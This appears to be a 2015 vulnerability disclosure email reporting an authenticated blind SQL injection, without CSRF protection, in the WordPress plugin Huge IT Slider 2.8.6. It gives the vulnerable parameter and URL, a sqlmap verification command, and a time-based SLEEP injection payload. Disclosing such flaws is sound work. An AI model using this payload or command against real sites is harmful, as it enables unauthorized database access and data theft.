Subject: Blind SQL injection in Huge IT Slider 2.8.6
Date: Wed, 22 Jul 2015 17:00:04 +0200

Hello,

Plugin: Huge IT Slider 2.8.6 https://wordpress.org/plugins/slider-image/

Authenticated users (like editors etc.) can execute arbitrary SQL commands (there is no CSRF protection).

1. SQL injection (showslider())

Method: GET
Url: http://localhost/wp-admin/admin.php?page=sliders_huge_it_slider&catid=1
Vulnerable parameter: catid

Example PHP callstack:
sliders_huge_it_slider   [/slider-image/slider.php:517]
showslider   [/slider-image/sliders.php:96]
wpdb::get_var

Verification:
sqlmap --cookie "..." --dbms mysql -u "http://localhost/wp-admin/admin.php?page=sliders_huge_it_slider&catid=1" -p catid

...
Parameter: catid (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: page=sliders_huge_it_slider&catid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))aHzR)
...


--
Regards,
Marcin Probola,